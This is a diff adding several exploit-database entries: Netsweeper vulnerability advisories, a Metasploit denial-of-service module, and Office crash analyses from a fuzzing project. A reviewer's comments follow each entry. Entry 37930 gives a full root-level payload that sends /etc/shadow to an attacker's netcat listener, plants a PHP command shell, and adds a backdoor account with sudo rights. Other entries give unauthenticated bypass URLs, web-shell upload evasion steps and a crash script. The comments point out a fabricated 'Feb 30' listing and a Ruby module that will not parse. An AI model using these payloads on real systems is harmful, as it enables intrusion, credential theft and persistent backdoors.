platforms/php/webapps/37929.txt Executable file

@ -0,0 +1,37 @@
+-----------------------------------------------------------------------+
+ Netsweeper 4.0.8 - Authentication Bypass (Disabling of IP Quarantine) +
+-----------------------------------------------------------------------+
Affected Product: Netsweeper
Vendor Homepage : www.netsweeper.com
Version : 4.0.8 (and probably other versions)
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
Patched : Yes
CVE : CVE-2014-9610
+---------------------+
+ Product Description +
+---------------------+
Netsweeper is a software solution specialized in content filtering.
+----------------------+
+ Exploitation Details +
+----------------------+
An unauthenticated user is able to remove from quarantine any IP address on Netsweeeper 4.0.8 (and probably other versions).
URL Path: http://netsweeper/webadmin/user/quarantine_disable.php?ip=127.0.0.1
+----------+
+ Solution +
+----------+
Upgrade to latest version.
+---------------------+
+ Disclosure Timeline +
+---------------------+
24-Nov-2014: Initial Communication
03-Dec-2014: Netsweeper responded
03-Dec-2014: Shared full details to replicate the issue
10-Dec-2014: Netsweeper fixed the issue in releases 3.1.10, 4.0.9, 4.1.2
17-Dec-2014: New releases 3.1.10, 4.0.9, 4.1.2 made available to the public
18-Dec-2014: Confirm fix
17-Jan-2015: CVE assigned CVE-2014-9610
11-Aug-2015: Public disclosure
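Review bot: the PoC is a single unauthenticated GET (`/webadmin/user/quarantine_disable.php?ip=127.0.0.1`) with no expected response, so a reader cannot tell success from a silent no-op; include the response body or the before/after quarantine state for the address. The impact line says "any IP address" but the sample uses 127.0.0.1, which is the appliance itself; a quarantined client address would make the bypass concrete.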

platforms/php/webapps/37930.txt Executable file

@ -0,0 +1,67 @@
+--------------------------------------------------------+
+ Netsweeper 4.0.9 - Arbitrary File Upload and Execution +
+--------------------------------------------------------+
Affected Product: Netsweeper
Vendor Homepage : www.netsweeper.com
Version : 4.0.9 (and probably other versions)
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
Patched : Yes
CVE : [CVE-2015-PENDING]
Advisory ID : [SECUID0-15-005]
+---------------------+
+ Product Description +
+---------------------+
Netsweeper is a software solution specialized in content filtering.
+----------------------+
+ Exploitation Details +
+----------------------+
Netsweeeper 4.0.9 (and probably other versions) allows an authenticated user with admin privileges, to upload arbitrary PHP code (eg PHP shell) and further execute it with root rights.
To replicate the bug:
1. Login as admin at https://<netsweeper>/webadmin
2. Go to System Tools | System Configuration
3. Select "Routes Advertising Service" then Add new Peer, and add the below:
4. At Peer Address (enter <netsweeper>'s IP, you may also use its default IP 192.168.100.100): 192.168.100.100
5. Comment: pwn3d
6. At File Template (copy and paste the below):
-----code snippet-----
#!/bin/sh
/usr/bin/nc <attacker_ip> 1234 < /etc/shadow
echo "<?php if(isset(\$_REQUEST['c'])){echo \"<pre>\";\$c=(\$_REQUEST['c']);system(\$c);echo \"</pre>\";die;} ?>" > /usr/local/netsweeper/webadmin/logs/secuid0.php
echo "secuid0:x:501:500::/tmp/:/bin/bash" >> /etc/passwd
#set secuid0 password to "secuid0"
echo "secuid0:\$1\$h8DmA\$LmWhQ71Bp6u253YOUTdnc0:16452:0:99999:7:::" >> /etc/shadow
echo "secuid0 ALL=(ALL) ALL" >> /etc/sudoers
#secuid0.net
-----code snippet-----
7. <Click the "Advanced Settings" button to show more fields>
8. Config file, set it to: /tmp/secuid0.sh
9. Service Restart Command, set it to: /bin/bash /tmp/secuid0.sh
10. Set up your netcat listener on port 1234
11. Once you submit the above bash script and rest of details ... you will receive a copy of /etc/shadow to your attacker_ip's netcat listener (#10), and also you will be able to interact with the injected php shell from: http://<netsweeper>/webadmin/logs/secuid0.php?c=ls
The injected script /tmp/secuid0.sh will run with root's privileges, so essentially the attacker owns the box and profits.
[root@localhost logs]# ls -al /tmp/
...
-rw-r--r-- 1 root root 219 Feb 30 12:40 secuid0.sh
...
+----------+
+ Solution +
+----------+
Upgrade to latest version.
+---------------------+
+ Disclosure Timeline +
+---------------------+
06-Apr-2015: CVE Request
08-Apr-2015: Issues reported to Netsweeper
08-Apr-2015: Netsweeper bug ID 15475
08-Apr-2015: Netsweeper response, tickets opened and issues will be resolved in the 4.0.11 and 4.1.5 releases
11-Aug-2015: Public disclosure
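Review bot: the listing shows `-rw-r--r-- 1 root root 219 Feb 30 12:40 secuid0.sh`; there is no 30 February, so this output was retyped or edited rather than captured and should not be presented as evidence. The issue is better described as post-authentication command execution than "file upload": the File Template is written to the path given in "Config file" (/tmp/secuid0.sh) and the "Service Restart Command" field (`/bin/bash /tmp/secuid0.sh`) is executed as root, i.e. an admin-controlled restart command runs whatever the admin typed. The template also appends a `$1$` MD5-crypt hash to /etc/shadow and a line to /etc/sudoers; dropping only the PHP shell would prove the same point with less collateral on a customer box. The CVE is still "PENDING", and the fix releases 4.0.11 and 4.1.5 appear only in the timeline, not under Solution.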

platforms/php/webapps/37931.txt Executable file

@ -0,0 +1,36 @@
+------------------------------------------------------------------------+
+ Netsweeper 3.0.6 - Authentication Bypass (Account and Policy Creation) +
+------------------------------------------------------------------------+
Affected Product: Netsweeper
Vendor Homepage : www.netsweeper.com
Version : 3.0.6 (and probably other versions)
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
Patched : Yes
CVE : CVE-2014-9611
+---------------------+
+ Product Description +
+---------------------+
Netsweeper is a software solution specialized in content filtering.
+----------------------+
+ Exploitation Details +
+----------------------+
An non-authenticated is able to provision new user accounts (and also create new policies under the same name as the newly created user accounts)
URL Path: http:/netsweeper:8080/webadmin/nslam/index.php?username=secuid0&password=secuid0&ip=127.0.0.1&theme=Global%20Web%20Admin%20Theme&groupname=
+----------+
+ Solution +
+----------+
Upgrade to latest version.
+---------------------+
+ Disclosure Timeline +
+---------------------+
24-Nov-2014: Initial Communication
03-Dec-2014: Netsweeper responded
03-Dec-2014: Shared full details to replicate the issue
18-Dec-2014: Confirm fix on version 4.0.5
17-Jan-2015: CVE assigned CVE-2014-9611
11-Aug-2015: Public disclosure
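Review bot: the URL is malformed (`http:/netsweeper:8080/...` with a single slash), and "An non-authenticated is able" is missing its noun ("An unauthenticated user is able"). The title and header say 3.0.6, but the timeline only records "Confirm fix on version 4.0.5", so the fixed release on the 3.x branch is never stated and the Solution line needs it. The PoC creates a user and a same-named policy through a GET with `username=secuid0&password=secuid0`, but neither the response nor the resulting account is shown, so there is nothing to confirm the write happened.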

platforms/php/webapps/37932.txt Executable file

@ -0,0 +1,42 @@
+--------------------------------------------------------+
+ Netsweeper 4.0.8 - Arbitrary File Upload and Execution +
+--------------------------------------------------------+
Affected Product: Netsweeper
Vendor Homepage : www.netsweeper.com
Version : 4.0.8 (and probably other versions)
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
Patched : Yes
CVE : CVE-2014-9619
+---------------------+
+ Product Description +
+---------------------+
Netsweeper is a software solution specialized in content filtering.
+----------------------+
+ Exploitation Details +
+----------------------+
Netsweeeper 4.0.8 (and probably other versions) allows an authenticated user with admin privileges on the Cloud Manager web console, to upload arbitrary PHP code (eg PHP shell) and further execute it.
To replicate the bug, pipe the following request while being authenticated using admin privileges: http://netsweeper/webadmin/ajaxfilemanager/ajaxfilemanager.php
From the response page you can upload any GIF-lookalike php shell (remember to use basic evasion technique for file to upload successfully, hint: filename="secuid0.php.gif" with gif like header and php shell following)
Then, access your shell from: https://netsweeper/webadmin/deny/images/secuid0.php.gif and profit.
+----------+
+ Solution +
+----------+
Upgrade to latest version.
+---------------------+
+ Disclosure Timeline +
+---------------------+
24-Nov-2014: Initial Communication
03-Dec-2014: Netsweeper responded
03-Dec-2014: Shared full details to replicate the issue
10-Dec-2014: Netsweeper fixed the issue in releases 3.1.10, 4.0.9, 4.1.2
17-Dec-2014: New releases 3.1.10, 4.0.9, 4.1.2 made available to the public
18-Dec-2014: Confirm fix
17-Jan-2015: CVE assigned CVE-2014-9619
11-Aug-2015: Public disclosure
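Review bot: As in the previous advisory, the Solution section says only "Upgrade to latest version." while the timeline is specific ("10-Dec-2014: Netsweeper fixed the issue in releases 3.1.10, 4.0.9, 4.1.2"); list those three releases in the Solution so the advisory stands on its own. The Exploitation Details switch between plain HTTP for the upload endpoint ("http://netsweeper/webadmin/ajaxfilemanager/ajaxfilemanager.php") and HTTPS for the retrieval path ("https://netsweeper/webadmin/deny/images/secuid0.php.gif"); say whether both schemes are served or settle on one. Spelling: "Netsweeeper 4.0.8" in the first sentence. From the operator's side, the useful fact buried in the text is that the file manager stores uploads under webadmin/deny/images and that a .php.gif name there is executed as PHP; a short detection and hardening note (no file with a double extension ending in .gif should exist in that directory, and an images directory should not need script execution at all) would make the advisory more actionable for defenders.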

platforms/windows/dos/37905.rb Executable file

@ -0,0 +1,54 @@
source: http://www.securityfocus.com/bid/55761/info
PowerTCP WebServer for ActiveX is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to crash the application (typically Internet Explorer), denying service to legitimate users.
PowerTCP WebServer for ActiveX 1.9.2 is vulnerable; other versions may also be affected.
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Description' => %q{ 'Name' => 'Dart Webserver
<= 1.9.0 Stack Overflow',
Dart Webserver from Dart Communications throws a stack
overflow exception
when processing large requests.
}
,
'Author' => [
'catatonicprime'
],
'Version' => '$Revision: 15513 $',
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2012-3819' ],
],
'DisclosureDate' => '9/28/2012'))
register_options([
Opt::RPORT(80),
OptInt.new('SIZE', [ true, 'Estimated stack size to exhaust',
'520000' ])
])
end
def run
serverIP = datastore['RHOST']
if (datastore['RPORT'].to_i != 80)
serverIP += ":" + datastore['RPORT'].to_s
end
size = datastore['SIZE']
print_status("Crashing the server ...")
request = "A" * size + "\r\n\r\n"
connect
sock.put(request)
disconnect
end
end
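Review bot: The four header lines at the top of the file ("source: http://www.securityfocus.com/bid/55761/info" through "PowerTCP WebServer for ActiveX 1.9.2 is vulnerable; other versions may also be affected.") are bare text in a .rb file, so Ruby will fail to parse the module before it can be loaded; prefix each of them with "#". In the update_info hash the 'Name' key has been swallowed into the 'Description' %q{...} literal ("'Description' => %q{ 'Name' => 'Dart Webserver" followed by "<= 1.9.0 Stack Overflow',"), leaving the module with no Name and a Description that contains the stray key and its quotes; move 'Name' => 'Dart Webserver <= 1.9.0 Stack Overflow' out to its own entry before 'Description' and drop the dangling comma line. In run, serverIP is built from RHOST and RPORT but never referenced afterwards, so it can be removed; 'Version' => '$Revision: 15513 $' is stale SVN keyword metadata. Minor: the OptInt default for SIZE is the string '520000' rather than the integer 520000.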

platforms/windows/dos/37909.txt Executable file

@ -0,0 +1,96 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=424&can=1
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug also reproduced in Office 2010 running on Windows 7 x86.
The crash is caused by a 1 bit delta from the original file at offset 0x31B. OffViz identified this offset as WordBinaryDocuments[1].WordBinaryDocument[0].WordFIB.FIBTable97.fcPlcfFldMom with an original value of 0x000072C6 and a fuzzed value of 0x00007AC6.
Attached files:
Fuzzed minimized PoC: 2509821532_min.doc
Fuzzed non-minimized PoC: 2509821532_crash.doc
Original non-fuzzed file: 2509821532_orig.doc
DLL Versions:
wwlib.dll: 12.0.6720.5000
msptls.dll: 12.0.6682.5000
Observed Crash:
eax=00000008 ebx=037bbec4 ecx=0f67df76 edx=c0c0c106 esi=00000000 edi=0012caec
eip=3124d7d4 esp=0012c9d8 ebp=0012c9e0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
3124d7ca 8b4d0c mov ecx,dword ptr [ebp+0Ch]
3124d7cd 8b5508 mov edx,dword ptr [ebp+8]
3124d7d0 56 push esi
3124d7d1 57 push edi
3124d7d2 7214 jb wwlib!FMain+0x9231 (3124d7e8)
=> 3124d7d4 8b32 mov esi,dword ptr [edx] ds:0023:c0c0c106=????????
3124d7d6 3b31 cmp esi,dword ptr [ecx]
0:000> kb L8
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012c9e0 3165adbb c0c0c106 0f67df76 00000008 wwlib!FMain+0x921d
0012c9f4 6bdd19f7 3211e7e0 c0c0c0c0 0f67df30 wwlib!DllGetLCID+0x1e64e5
0012caa8 6bdd24c8 0000000f 0012cd90 00127965 MSPTLS!LssbFIsSublineEmpty+0x1f3f
0012cb28 6bddf8e0 00000000 0012cd90 00000000 MSPTLS!LssbFIsSublineEmpty+0x2a10
0012cb8c 6bddff5d 037bbec0 00000000 0012cdb4 MSPTLS!LssbFIsSublineEmpty+0xfe28
0012cbbc 6bddf1ef 00000000 00000000 0ee10fa0 MSPTLS!LssbFIsSublineEmpty+0x104a5
0012cdc0 6bdc4b85 0304a320 00000bc1 00116333 MSPTLS!LssbFIsSublineEmpty+0xf737
0012cdf4 312dbeea 0304a320 00000bc1 00116333 MSPTLS!LsCreateLine+0x23
The value in edx is an application verifier canary value for uninitialized heap data. Looking back up the call stack we can see the instruction that pushed this value:
6bdd19de 8d45d0 lea eax,[ebp-30h]
6bdd19e1 50 push eax
6bdd19e2 ff7704 push dword ptr [edi+4]
6bdd19e5 8b45f8 mov eax,dword ptr [ebp-8]
=> 6bdd19e8 ff704c push dword ptr [eax+4Ch]
6bdd19eb 8b45fc mov eax,dword ptr [ebp-4]
6bdd19ee ff7004 push dword ptr [eax+4]
6bdd19f1 ff908c000000 call dword ptr [eax+8Ch] ds:0023:025ac3ac=3165ada3
6bdd19f7 3bc6 cmp eax,esi
Examining memory at [ebp-8] we see:
0:000> dds poi(ebp-8)-4
11c22cb4 11c22d2c # pointer to next heap chunk
11c22cb8 4e44534c # tag NDSL (eax points here)
11c22cbc 11c22d30 # flink?
11c22cc0 11c22c40 # blink?
11c22cc4 00000aea
11c22cc8 00000aea
11c22ccc 02642ec4
11c22cd0 00000000
11c22cd4 00000000
11c22cd8 00000aea
11c22cdc 00000000
11c22ce0 00000aea
11c22ce4 00000000
11c22ce8 00000000
11c22cec c0c0c0c0
11c22cf0 c0c0000d
11c22cf4 00001800
11c22cf8 00000000
11c22cfc 00001800
11c22d00 00000000
11c22d04 c0c0c0c0 # pushed value (eax+4ch) uninitialized
11c22d08 c0c0c0c0
11c22d0c c0c0c0c0
11c22d10 c0c0c0c0
11c22d14 c0c0c0c0
11c22d18 c0c0c0c0
11c22d1c c0c0c0c0
11c22d20 c0c0c0c0
11c22d24 c0c0c0c0
11c22d28 c0c0c0c0
11c22d2c 11c22da4 # start of next heap chunk
11c22d30 4e44534c
An attacker may control the uninitialized value by first allocating a heap chunk of the same size such that it will land in the same spot as the above chunk. The attacker can write data to the +4ch offset and then free the chunk back to the system. The attacker will then have control over the pointer in eax+4ch when it is used during . If this points to a valid page it will survive the dereferences in the crashing path. It did not look as though there was an immediately path to cause an out of bounds memory write. However, it is likely that this attacker controlled pointer will need to be free-ed later in execution.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37909.zip
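Review bot: The last analysis sentence is cut off: "The attacker will then have control over the pointer in eax+4ch when it is used during ." ends without naming the operation; restore the missing object. Two more wording fixes in that paragraph: "an immediately path" should be "an immediate path", and "free-ed" should be "freed". The chain from the push to the fault is also left implicit: the value pushed at 6bdd19e8 is an argument to the call at 6bdd19f1 into wwlib (return address 6bdd19f7 in the kb output), two frames above the faulting "mov esi,dword ptr [edx]", and the dds dump line "11c22d04 c0c0c0c0 # pushed value (eax+4ch) uninitialized" shows the value as c0c0c0c0 while edx at the crash is c0c0c106; saying what happens to the value between the push and the dereference (some arithmetic evidently is applied) would let a reader verify the uninitialized-use claim from the listings alone.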

platforms/windows/dos/37910.txt Executable file

@ -0,0 +1,88 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=423&can=1
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug also reproduced in Office 2010 running on Windows 7 x86.
The minimized version of the PoC has three deltas at offsets 0x2404, 0x4041, and 0x8057. OffViz identified these as WordBinaryDocuments[1].WordBinaryDocument[0].stPapxFKPs[23].PAPXFKP[1].rgfc[7].rgfc[1], WordBinaryDocuments[1].WordBinaryDocument[0].stPapxFKPs[23].PAPXFKP[9].rgfc[23].rgfc[16], and WordBinaryDocuments[1].WordBinaryDocument[0].stPapxFKPs[23].PAPXFKP[22].rgbx[11].BXPAP[3].bOffset respectively.
Attached files:
Fuzzed minimized PoC: 1981563878_min.doc
Fuzzed non-minimized PoC: 1981563878_crash.doc
Original non-fuzzed file: 1981563878_orig.doc
DLL Versions:
wwlib.dll: 12.0.6720.5000
mso.dll: 12.0.6721.5000
user32.dll: 5.2.3790.4033
Observed Crash:
eax=17dd0f5b ebx=17dd0f5b ecx=00010100 edx=00010400 esi=00000002 edi=0355d2e8
eip=312ab63d esp=0012dbc0 ebp=0012dbc8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
312ab63d ffb0b8000000 push dword ptr [eax+0B8h] ds:0023:17dd1013=????????
312ab643 ffb0b0000000 push dword ptr [eax+0B0h]
312ab649 ffb0b4000000 push dword ptr [eax+0B4h]
312ab64f ffb0ac000000 push dword ptr [eax+0ACh]
312ab655 ff7518 push dword ptr [ebp+18h]
312ab658 e8edfcffff call wwlib!FMain+0x66d93 (312ab34a)
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012dbc8 312ab1ff 0355d2e8 0355d2e8 17dd0f5b wwlib!FMain+0x67086
0012dc80 312aad93 0355d2e4 0355d2e8 0355d2e8 wwlib!FMain+0x66c48
0012dcd4 3131b437 0355d2e4 0355d2e8 0012dd1c wwlib!FMain+0x667dc
0012dd30 3131b2e5 2b0127d9 00000000 00000001 wwlib!FMain+0xd6e80
0012e028 31302777 0355d2e4 ffffffff 32123af8 wwlib!FMain+0xd6d2e
0012e130 31304eb5 0155d2e4 00000002 00000000 wwlib!FMain+0xbe1c0
0012e164 3131a5a4 0355d2e4 00000002 0355d2e4 wwlib!FMain+0xc08fe
0012e1bc 312a2780 0355d2e4 00000002 0012e2c0 wwlib!FMain+0xd5fed
0012e248 7739b6e3 030b025a 0000000f 00000000 wwlib!FMain+0x5e1c9
0012e274 7739b874 312a2331 030b025a 0000000f USER32!InternalCallWinProc+0x28
0012e2ec 7739c8b8 00000000 312a2331 030b025a USER32!UserCallWinProcCheckWow+0x151
0012e348 7739c9c6 028c9d38 0000000f 00000000 USER32!DispatchClientMessage+0xd9
0012e370 7c8282f6 0012e388 00000018 0012e4bc USER32!__fnDWORD+0x24
0012e39c 7739cbb2 7739cb75 018e01a2 0000005e ntdll!KiUserCallbackDispatcher+0x2e
In this crash eax is coming from the 3rd argument passed into the function at 0x312ab5e7. It is pointing to valid memory allocated with the following call stack:
0:000> !heap -p -a 0x17dd0f5b
address 17dd0f5b found in
_DPH_HEAP_ROOT @ 1151000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
170a8400: 17dd0f58 a8 - 17dd0000 2000
7c83d6d4 ntdll!RtlAllocateHeap+0x00000e9f
0189fd2c vfbasics!AVrfpRtlAllocateHeap+0x000000b1
33103a8f mso!Ordinal1743+0x00002e07
329c7e66 mso!MsoPvAllocCore+0x0000005a
31249eb5 wwlib!FMain+0x000058fe
312f7a55 wwlib!FMain+0x000b349e
312f79d2 wwlib!FMain+0x000b341b
312f727e wwlib!FMain+0x000b2cc7
The indexes being pushed onto the stack eax +0xB8, +0xB0, +0xB4, and +0xAC push the value beyond the allocated size of a8. With pageheap enabled this causes a fault at the first push. This is an exploitable bug because the function at 0x312ab34a uses these values in memory write operations:
0:000> uf 312ab34a
wwlib!FMain+0x66d93:
312ab34a 55 push ebp
312ab34b 8bec mov ebp,esp
312ab34d 8b4508 mov eax,dword ptr [ebp+8]
312ab350 8b4d0c mov ecx,dword ptr [ebp+0Ch]
312ab353 8b5510 mov edx,dword ptr [ebp+10h]
=> 312ab356 2908 sub dword ptr [eax],ecx
=> 312ab358 015008 add dword ptr [eax+8],edx
312ab35b 8b4d14 mov ecx,dword ptr [ebp+14h]
312ab35e 8b5518 mov edx,dword ptr [ebp+18h]
=> 312ab361 294804 sub dword ptr [eax+4],ecx
=> 312ab364 01500c add dword ptr [eax+0Ch],edx
312ab367 5d pop ebp
312ab368 c21400 ret 14h
At attacker may control these values by grooming memory so that he or she controls the memory after the a8 sized chunk. This can lead to memory corruption and arbitrary code execution. The root cause of this bug suggestive of a type confusion vulnerability earlier in the call stack but this has not been determined with certainty.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37910.zip
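Review bot: Typos in the closing paragraph: "At attacker may control these values" should be "An attacker may control these values", and "The root cause of this bug suggestive of" is missing its verb ("is suggestive of"). The exploitability argument would be clearer if it said which pushed value becomes the write target in the callee: of the five pushes before the call to 312ab34a, the last one ("push dword ptr [ebp+18h]") is the callee's first argument, i.e. the eax that "sub dword ptr [eax],ecx" and the following add/sub write through, while the four out-of-bounds loads from eax+0xB8/0xB0/0xB4/0xAC become the operands. The corruption is therefore of whatever the caller's [ebp+18h] points at, by deltas read from past the end of the a8-byte chunk; that is the point the text should make rather than leaving the reader to derive it from "ret 14h".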

platforms/windows/dos/37911.txt Executable file

@ -0,0 +1,69 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=420&can=1
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug also reproduced in Office 2010 running on Windows 7 x86.
The crash is caused by a 1 bit delta from the original file at offset 0x4A45. OffViz identified this offset as OLESSRoot.DirectoryEntries[100].OLESSDirectoryEntry[20].sidLeft with an original value of 0x00000000 and a fuzzed value of 0x00008000.
Attached files:
Fuzzed minimized PoC: 1863274449_min.doc
Fuzzed non-minimized PoC: 1863274449_crash.doc
Original non-fuzzed file: 1863274449_orig.doc
DLL Versions:
OGL.dll: 12.0.6719.5000
wwlib.dll: 12.0.6720.5000
GDI32.dll: 5.2.3790.5563
eax=ffff0002 ebx=12b85fd8 ecx=fffff975 edx=fffc0008 esi=ffff8000 edi=12b81f50
eip=3bd186a1 esp=00129f68 ebp=00129f98 iopl=0 nv up ei ng nz na po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010283
3bd1869c 8bd0 mov edx,eax
3bd1869e c1e202 shl edx,2
OGL!DpOutputSpanStretch<1>::OutputSpan+0x13e:
3bd186a1 890c1a mov dword ptr [edx+ebx],ecx ds:0023:12b45fe0=????????
0:000> kb L8
ChildEBP RetAddr Args to Child
00129f98 3be70c01 0000014c 000001d9 00000267 OGL!DpOutputSpanStretch<1>::OutputSpan+0x13e
00129fcc 3be6f93d 0000014c 000001d9 00000267 OGL!EpAntialiasedFiller::OutputSpan+0x2f
00129ff0 3be70ba0 0000014c 000001d9 00000267 OGL!DpClipRegion::OutputSpan+0x84
0012a010 3be6e30c 0000014c 0012aa38 00000533 OGL!EpAntialiasedFiller::GenerateOutputAndClearCoverage+0x62
0012a038 3be7052c 00000533 000001e6 00000798 OGL!EpAntialiasedFiller::FillEdgesAlternate+0x102
0012a050 3be6f8a0 7fffffff 0012a0ac 00000000 OGL!RasterizeEdges+0xa7
0012ab08 3bd43c10 0012abc0 0012ab3c 3be70d78 OGL!RasterizePath+0x2ce
0012acf4 3be4cd7e 1292eda8 0012ae10 122f2f98 OGL!DpDriver::DrawImage+0x230
In this crash ebx is pointing to valid memory allocated from OGL!DpOutputSpanStretch<1>::InitializeClass with a size of 24. However, the edx value appears to have a sign extension issue leading to an out of bounds write. When eax was moved to edx at 0x3bd1869c eax already appeared to have sign extended value (0xffff0002). Eax is being updated in a loop in this function starting at 0x3bdb94d5. The value originally comes from [edi+9ch]. This will be set to 0xffff0002 on the crashing iteration. The offset at [edi+9ch] is updated at 0x3be18b37 and 0x3be18b49. Tracing back from these writes just a bit further we can step through the crux of the issue during the first loop iteration:
eax=800182ae ebx=000100d7 ecx=8004845a edx=00008005 esi=80008100 edi=128a1f50
eip=3bdb946a esp=00129f68 ebp=00129f98 iopl=0 ov up ei ng nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000a96
OGL!DpOutputSpanStretch<1>::OutputSpan+0x65:
3bdb946a c1f910 sar ecx,10h
0:000> p
eax=800182ae ebx=000100d7 ecx=ffff8004 edx=00008005 esi=80008100 edi=128a1f50
eip=3bdb946d esp=00129f68 ebp=00129f98 iopl=0 nv up ei ng nz na po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000283
OGL!DpOutputSpanStretch<1>::OutputSpan+0x68:
3bdb946d c1fe10 sar esi,10h
0:000> p
eax=800182ae ebx=000100d7 ecx=ffff8004 edx=00008005 esi=ffff8000 edi=128a1f50
eip=3bdb9470 esp=00129f68 ebp=00129f98 iopl=0 nv up ei ng nz na pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000287
OGL!DpOutputSpanStretch<1>::OutputSpan+0x6b:
3bdb9470 81faffffff7f cmp edx,7FFFFFFFh
The sar instruction applied to ecx and esi will sign extend the values in these registers. If this is allowed to happen there must be a check to ensure that the resulting values are still in range to the allocated heap buffer.
To get your debugger to the correct spot given the attached PoC realize that there are two DpOutputSpanStretch object created before the crash. The first one is of no consequence. The OutputSpan function is also called twice on this new object before entering the crashing state. I suggest using a conditional breakpoint to get to the correct spot:
bp 3bdb946d ".if (@esi & 0x`ffffffff) = 0x`80008100 {} .else{gc}"
This crash is writing to a memory address out-of-bound to the allocated buffer, therefore this is an exploitable vulnerability.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37911.zip
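Review bot: The addresses in this report come from more than one debugging session with OGL.dll at different bases: the crash dump places OutputSpan+0x13e at 3bd186a1, but the trace places OutputSpan+0x65 at 3bdb946a, and the text then cites 0x3bdb94d5, 0x3be18b37 and 0x3be18b49 as absolute addresses. Give every location as module!function+offset (as the kb output already does) and express the suggested breakpoint the same way, because "bp 3bdb946d ..." will not land on the "sar esi,10h" once the module is loaded elsewhere. The register dump after the DLL Versions list also lacks the "Observed Crash:" label the sibling reports use. Grammar: "still in range to the allocated heap buffer" should be "still within the bounds of the allocated heap buffer", and "there are two DpOutputSpanStretch object created" should be "two DpOutputSpanStretch objects are created".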

platforms/windows/dos/37912.txt Executable file

@ -0,0 +1,71 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=417&can=1
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 running on Windows 7 x86. The attached PoC file will reproduce when Word is closed. However, there were other crashing files (not attached) faulting on the same EIP that did not require Word to be be closed to trigger the crash. This particular PoC did not minimize cleanly and has 666 deltas from the original non-fuzzed file.
Attached files:
Fuzzed non-minimized PoC: 2435406723_crash.doc
Original non-fuzzed file: 2435406723_orig.doc
DLL Versions:
mso.dll: 12.0.6721.5000
wwlib.dll: 12.0.6720.5000
Observed Crash:
eax=0012bd13 ebx=000008ac ecx=00000003 edx=334b9dbc esi=00019910 edi=00000000
eip=329dc5b6 esp=0012bd04 ebp=0012bd08 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
mso!Ordinal649:
329dc5a3 55 push ebp
329dc5a4 8bec mov ebp,esp
329dc5a6 56 push esi
329dc5a7 8b7508 mov esi,dword ptr [ebp+8]
329dc5aa 85f6 test esi,esi
329dc5ac 742b je mso!Ordinal649+0x36 (329dc5d9)
329dc5ae 8d4d0b lea ecx,[ebp+0Bh]
329dc5b1 e8aad2feff call mso!Ordinal6797+0xa8 (329c9860)
=> 329dc5b6 ff36 push dword ptr [esi] ds:0023:00019910=????????
329dc5b8 e8d5cbfeff call mso!MsoFreePv (329c9192)
0:000> kb 8
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012bd08 31252d68 00019910 0db269c0 0012bd54 mso!Ordinal649+0x13
0012bd18 31339e69 0db26f94 0db269c0 035784cc wwlib!FMain+0xe7b1
0012bd54 31338a56 00000000 00000080 035784cc wwlib!FMain+0xf58b2
0012bda4 313385a6 0db269c0 00000800 00000000 wwlib!FMain+0xf449f
0012bdc4 31337401 00000000 00000800 9d186de9 wwlib!FMain+0xf3fef
0012be2c 3133720b 00000000 0db269c0 00000000 wwlib!FMain+0xf2e4a
0012ceac 3134d981 00d20192 00000000 00000001 wwlib!FMain+0xf2c54
0012cf40 7739b6e3 00d20192 00000010 00000000 wwlib!FMain+0x1093ca
The value in esi is coming from [arg0+5d4] in the calling function. This value was set in a different code path. If we find where arg0 was originally allocated and set a memory write hardware breakpoint on that location we can find several writes to this location. The value 00019910 is set from the following code:
eax=00019910 ebx=00000038 ecx=00000000 edx=00000003 esi=0da3e9c0 edi=0da3ef98
eip=3128d559 esp=0012cacc ebp=0012caf8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
0:000> kb L8
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012caf8 3128d49e 00000000 0000000a aae8528c wwlib!FMain+0x48fa2
0012cc44 31497035 0da3e9c0 0001a1ab 00000000 wwlib!FMain+0x48ee7
0012cd38 3149812e 0da3e9c0 0001a1ab 0012d050 wwlib!DllGetLCID+0x2275f
